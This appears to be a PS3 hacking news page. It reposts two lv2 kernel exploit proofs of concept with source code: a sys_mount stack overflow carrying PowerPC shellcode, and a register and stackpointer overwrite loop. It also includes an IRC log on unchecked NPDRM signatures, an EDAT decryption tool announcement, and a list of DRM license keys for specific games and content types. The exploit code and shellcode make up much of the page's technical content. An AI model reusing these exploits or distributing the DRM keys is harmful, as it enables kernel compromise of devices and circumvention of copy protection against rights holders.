39w ago - Following up on his
PS3 SCETool update and
PS3 Dump_Rootkey code, today Sony PlayStation 3 hacker
Naehrwert has posted some details on exploiting the PlayStation 3 lv2_kernel and has made available a sample 3.41 implementation below.
To quote from his blog: Exploiting (?) lv2
A long while ago
KaKaRoTo pointed me to a stack overflow he found while reversing lv2_kernel. But there are two problems:
1. The vulnerability is in a protected syscall (the SELF calling it got to have the 0x40... control flags set). So you’d first need to find a suitable usermode exploit (don’t ask us), that gives you code execution with the right privileges.
2. The payload data is copied to lv2 heap first and the function will do a free call on it before the payload has any chance to get executed. This might not sound like a problem but it looks like lv2′s heap implementation will overwrite the free’ed space with 0xABADCAFE and thus destroy the payload.
Here (pastie.org/4755699) is my sample implementation for 3.41 lv2_kernel (although the vulnerability should be present in all versions of lv2 up to the latest firmware), maybe someone of you will find a way to overcome problem (2.) and can get something nice out of it because right now it’s only good to crash lv2.
/*
* lv2 sys_mount stack overflow
* Original finder: KaKaRoTo (thank you for pointing it out!)
* Note: all offsets/values/addrs in this source are 3.41 specific
*/
#include <stdio.h>
#include <ppu-types.h>
#include <ppu-lv2.h>
/*
unk2, unk3 is what we're going to use here.
lv2 will handle unk2, unk3 like this:
char *strlist[FIXED_SIZE]; //On stack.
for(i = 0; i < unk3; i++)
strlist[i] = strdup_from_uspace(*unk2++);
*/
static s64 sys_mount(const char *dev /*r3*/, const char *fs /*r4*/, const char *path /*r5*/,
u64 unk0 /*r6*/, u64 wp /*r7*/, u64 unk1 /*r8*/, const char **unk2 /*r9*/, u64 unk3 /*r10*/)
{
lv2syscall8(837, (u64)dev, (u64)fs, (u64)path,
(u64)unk0, (u64)wp, (u64)unk1, (u64)unk2, (u64)unk3);
return_to_user_prog(s64);
}
//For testing.
static void patch_access_check()
{
//check_access @ 0x80000000000505D0
//li r3, 1 ; blr
lv2syscall2(7, 0x80000000000505D0ULL, 0x386000014E800020ULL);
printf("[*] DEBUG: access check patched.\n");
}
int main(int argc, const char **argv)
{
//Problem: The mount syscall needs the 0x40 ctrl flag (root) to be set.
//Solution: Find a usermode exploit in a SELF that has them set.
//Patch the ctrl flags check for testing.
patch_access_check();
//Nop.
char nop[] = "X";
//Payload.
char payload[] =
{
//Insert valid PPC code here (without 0x00 bytes)
//and hope lv2 heap 0x27 is executable and 0x04 aligned.
0x38, 0xE0, 0x7E, 0xF0, //li r7, 0x7EF0
0x38, 0xE7, 0x01, 0x10, //addi r7, r7, 0x110
0x78, 0xE7, 0x83, 0xE4, //sldi r7, r7, 16
0x78, 0xE7, 0x07, 0xC6, //sldi r7, r7, 32
0x60, 0xE7, 0x91, 0x34, //ori r7, r7, 0x9134
0x7C, 0xE9, 0x03, 0xA6, //mtctr r7 ; 0x8000000000009134 (sys_sm_shutdown)
0x38, 0x60, 0x02, 0x10, //li r3, 0x210
0x38, 0x63, 0xFF, 0xF0, //addi r3, r3, -0x10 ; 0x200 (reboot)
0x7C, 0x84, 0x22, 0x78, //xor r4, r4, r4 ; 0
0x7C, 0xA5, 0x2A, 0x78, //xor r5, r5, r5 ; 0
0x7C, 0xC6, 0x32, 0x78, //xor r6, r6, r6 ; 0
0x4E, 0x80, 0x04, 0x20, //bctr
//End of payload.
0x00
};
//List containing the entries.
//stack frame size is 0x1C0
//strlist = framptr + 0xE0
//remaining stack frame size is 0xE0 (28 * 8)
#define LIST_LENGTH (28 + 2 + 1)
const char *list[LIST_LENGTH] =
{
//-0xE0
//Overwrite stack with nop entries (0xE0 bytes).
nop, nop, nop, nop, nop, nop, nop, nop, //0x40
nop, nop, nop, nop, nop, nop, nop, nop, //0x80
nop, nop, nop, nop, nop, nop, nop, nop, //0xC0
nop, nop, nop, nop,
//0x00
//Fill 0x10 bytes to reach saved r0.
nop, nop,
//+0x10
//Overwrite saved r0 with a pointer to our payload.
payload
};
//Doit!
printf("[*] Taking the plunge...\n");
s64 res = sys_mount("FOO", "BAR", "XXX", 0, 0, 0, list, LIST_LENGTH);
printf("[*] Error: sys_mount returned (res = 0x%016lX).\n", (u64)res);
return 0;
} From
Mathieulh (via pastebin.com/naxXkv3M):
Sep 04 13:16:42 <Mathieulh> I just posted one last thing
Sep 04 13:17:05 <Mathieulh> I dislike being called "king of liars" especially by someone who doesn't understand sht about ps3 self crypto
Sep 04 13:17:25 <Mathieulh> and yeah I said the truth
Sep 04 13:17:31 <Mathieulh> this footer signature
Sep 04 13:17:33 <Mathieulh> is not checked
Sep 04 13:17:35 <Mathieulh> even in 4.21
Sep 04 13:17:37 <Mathieulh> go figure
Sep 04 13:17:44 <Mathieulh> at least not upon npdrm self execution
Sep 04 13:17:59 <Mathieulh> I believe it is checked while the packages install
Sep 04 13:18:03 <Mathieulh> but that's something else
Sep 04 13:18:31 <Mathieulh> I don't even think it was called on 3.55 at all, (the function that does the stuff)
Sep 04 13:18:33 <Mathieulh> that's also wrong info
Sep 04 13:18:35 <Mathieulh> I gave kakaroto
Sep 04 13:18:40 <Mathieulh> over a week of work
Sep 04 13:18:48 <Mathieulh> with everything one would want to know
Sep 04 13:18:52 <Mathieulh> about self format
Sep 04 13:19:16 <Mathieulh> but he called it "useless" without revealing what I gave him
Sep 04 13:19:31 <Mathieulh> and he claimed how all of this was already public when most wasn't
Sep 04 13:19:47 <Mathieulh> he did all this along with his pamphlet in order to hide his incompetence
Sep 04 13:20:04 <Mathieulh> as he was "begging" me (literally) to get the extra info he needed to get his hack to work
Sep 04 13:20:09 <Mathieulh> and I told him to figure the rest himself
Sep 04 13:20:12 <Mathieulh> and he never could
Sep 04 13:20:19 <Mathieulh> figures
Sep 04 13:20:34 <Mathieulh> zecoxao, I gave him something he needed
Sep 04 13:20:42 <Mathieulh> but he wanted me to supply ALL the work
Sep 04 13:20:48 <Mathieulh> and I wasn't ok with that
Sep 04 13:20:58 <Mathieulh> the more I gave him
Sep 04 13:21:00 <Mathieulh> the more he asked
Sep 04 13:21:32 <Mathieulh> but yeah
Sep 04 13:22:03 <Mathieulh> if you can actually resign lv0, and put your own keyset in appldr on 4.21
Sep 04 13:22:16 <Mathieulh> and set your own keyset to something higher than 0x0D
Sep 04 13:22:35 <Mathieulh> and build a complying npdrm that has all the new values appldr checks, WITHOUT the so called footer
Sep 04 13:22:37 <Mathieulh> and run it
Sep 04 13:22:41 <Mathieulh> it runs just fine...
Sep 04 13:22:51 <Mathieulh> (yes, I did test this)
Sep 04 13:23:18 <Mathieulh> they do whitelist anything older than keyset 0x0D now for npdrm too
Sep 04 13:23:32 <Mathieulh> so crafting npdrms for 4.21 would not work on ofw now
Sep 04 13:23:38 <Mathieulh> but that stupid footer
Sep 04 13:23:47 <Mathieulh> which he claims is why whatever I told him was BS
Sep 04 13:23:54 <Mathieulh> is STILL NOT CHECKED
Sep 04 13:24:22 <Mathieulh> Kraparoto banned me from all the chans he is op as soon as I exposed him
Sep 04 13:24:27 <Mathieulh> how mature of him eh ?
Sep 04 13:25:22 <Mathieulh> so not only he is an incompetent whining kid, but he also totally lacks maturity
Sep 04 13:25:28 <Mathieulh> so I am done with the stupid drama
Sep 04 13:25:32 <Mathieulh> or talking to him
The footer signature is still not checked upon npdrm self files execution as of 4.21.
Because kakaroto says something that doesn't make it true. Basically he found a check in 3.55 that was not even called and assumed they used it in 3.60+.
Of course they do whitelist npdrm now so even if the footer isn't checked you cannot run your own npdrm selfs signed with keyset lower than 0x0D making the whole debate rather pointless. Aditional checks are now performed on the actual file format as well such as the segment counter flag that needs to be set to 0x01 except for the very last segment.
Finally, from
KDSBest (via twitlonger.com/show/jcmh80): Since naehrwert posted an lv2 exploit I will do so too
. The stack pointer points to lv2 and if we do a syscall, the syscall saves register to the stack HAHA.
Btw. It just crashes the console for now, since I totally overwrite dump the lv2 or some memory addresses I don't know. Feel free to try around, adjust the address of the stackpointer and so on. If you managed to get the panic payload executed. Tell me!!! ^^
//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf
register unsigned long long payloadHolder2 asm ("r21");
register unsigned long long payloadHolder asm ("r20");
register unsigned long long stackpointer asm ("r1");
register unsigned long long counter asm ("r25");
register unsigned long long bufferStackpointer asm ("r26");
int __volatile__ main(int argc, const char* argv[])
{
// backup Stack pointer
bufferStackpointer = stackpointer;
payloadHolder = 0x3960024F3960024FUL;
payloadHolder2 = 0x4400000244000002UL;
// Incrementer
counter = 0x00;
// Play with that address till the panic is executed, I lack of time todo so
// add always 2 or 4 to it, i would try 4 or 8... bla bla you will get the idea
stackpointer = 0x8000000000000100UL;
doItAgain:
// KDSBest Payload
// Prepare for our Syscall
asm("li %r0, 0x0");
asm("li %r3, 0x6");
asm("li %r4, 0x1");
// li r11, 0x24F -> PANIC
asm("mr %r22, %r20");
asm("mr %r23, %r20");
asm("mr %r24, %r20");
asm("mr %r27, %r20");
asm("mr %r28, %r20");
asm("mr %r29, %r20");
asm("mr %r30, %r20");
asm("mr %r31, %r20");
// Stack Pointer = Build Address of LV2
stackpointer += counter;
// Syscall 0xA9
asm("li %r11, 0xA9");
asm("sc");
counter += 0x04;
// We write sc
asm("mr %r22, %r21");
asm("mr %r23, %r21");
asm("mr %r24, %r21");
asm("mr %r27, %r21");
asm("mr %r28, %r21");
asm("mr %r29, %r21");
asm("mr %r30, %r21");
asm("mr %r31, %r21");
// Stack Pointer = Build Address of LV2
stackpointer += counter;
// Syscall 0xA9
asm("li %r11, 0xA9");
asm("sc");
counter += 0x04;
if(counter < 0x1000000)
goto doItAgain;
stackpointer = bufferStackpointer;
return 0;
} I didn't managed to make it work on 4.21 so I just did on 4.20
could someone re upload the eu version please?...
Download: http://www.mediafire.com/?1oz8fin4r9mbprz / http://rghost.net/45384276 by RikuKH3 (Here's unedat tool, it decrypts any EDATs and you don't have to enter devklic key. Java and bcprov-jdk16-1.46 required.) / http://www.mediafire.com/?si1ky606sz3g514
To quote: Finally, everyone can use this tool to decrypt and encrypt edat files on pc.
Thanks for KDSBest, JuanNadie, flatz, aldostool, BUC and other people I did not mentioned. Without their previous hard work I would not have made this tool.
TrueAncestor EDAT Rebuilder v1.0 Features
1. Decrypt and encrypt edat files on pc.
2. Fast rebuild mode.
3. Batch mode.
4. Dev Klic should be input manually at now.
If someone can make a command line bruteforce dec_klic tool for me, it would be fantastic.
Below is a video from Mustgaming andeverything showing you how to decrypt all PS3 dlc games (no need for any react psn anymore) with free dlc edat. This gui can decrypt and encrypt all kinds of edat and we can make our own fixes
EDAT Files List
1. dlc3.edat
Note: Batch mode will try to rebuild all EDAT files with the input Dev Klic.
[?]Enter EDAT file number to decrypt / A to abort / B to batch:1
• Please follow this Dev KLicensee sample:00000000000000000000000000000000
[?]Please enter Dev KLicensee / A to abort:AF0A8F0A8909F09234091AFADF909AF0
• Rebuilding dlc3.edat...
[!]Decrypt dlc3.edat failed, check if rap file is valid.
[!]Rebuilding aborted.
• Press any key to continue...
1. Fix JavaMemoryOut for encrypting big files.
2. Add JVM Memory config in tool\core.cfg.
ReActPSN does everything for you if you only want to play games or dlcs. Since edat can be decrypt now, we can get raw game data. It is more easy for people to edit the gamedata or create an unlock edat that has not been released officially. If you encrypt the file with improper dev klic, the edat file will not work. Some public dev klic you can use now:
2A6AFBCF43D1579F7D738741A13BD42E for Minis
52C0B5CA76D6134BB45FC66CA637F2C1 for PSX
72F990788F9CFF745725F08E4C128387 for Theme/C00 unlock edat
0DB85732366CD734FC879E743343BB4F for PSP Remaster
From capostef: Some klics I have found
Sonic Adventure NPUB30249 78451236947833568742332154875567
Sonic Adventure 2 NPUB30579 780589151DC3468A5818CE6626166518
GTA IV NPUB30702 12345678123456781234567812345678
Worms Armageddon 2 NPUB30230 C4063B2BDD0C4A72813B740BA55324C2
PlayStation Move Heroes NPEA00303 4361726C2D48656E72696B52756C6573
Finally, in related PS3 homebrew news today http://www.mediafire.com/download.php?maa82dlq5v714l3 is now released by Stephen88 (via ps3mod.altervista.org/T-PS3MOD-BETA-PS3GAME-INFO-V1-BETA?pid=74711#pid74711) who stated the following, roughly translated:
PS3Game Info is a simple PC program with which you can get a first impression of the characteristics of a certain game PS3, only to pull over the file PARAM.SFO! Here below the list of features that you can see about a game:
• Internal disk (yes / no)
• External disc (yes / no)
• BD Mirror (yes / no)
• Eboot Fix (yes / no)
• Which Firmware required
• External cache (yes / no)
• Without disc (yes / no)
• Updates (yes / no)
• DLC (yes / no)
• Size
• True Blue (yes / no)
How does it work?
Information of each game are contained in a private database of PS3Mod, so you should expect excellent results. Since as you may have read in the title, this program is a beta, so please report me any deficiency / failure to improve the program and update the database! For Use: Drag the PARAM.SFO the game you want in the address box!
More PlayStation 3 News...
Download: http://www.sendspace.com/file/um5ds7 / http://www.sendspace.com/file/9nkx0y / http://www.sendspace.com/file/manvmw
Below are the changes, as follows:
Version 1.20 Changelog:
• made minor alterations to code.
• now after entering title id it asks for the games title then automatically adds it to the param.sfo.
• added support for creating a ps2 classic dex ISO.BIN.ENC.
Version 1.21 Changelog: Hey guys here is v1.21 test version i have released which has been tested on windows 8 x86 and x64 also windows vista x64 so hopefully it will work for everyone. also i have changed the logo for one created by brakk3n so let me know what you think i have also altered quite a bit of code for example now instead of keep extracting the files if it detects the folders it wont extract them again. also if a file doesn't exist its gonna use it will unzip it so hopefully this will not only increase the speed but reduce errors. i have also added support for resigning game updates that contain self files but i cannot test it since i'm on 4.30.2 and it would most likely work on it.. especially if its resigning to lower CFW so that will need testing, so let me know if this works for you thanks.
More PlayStation 3 News...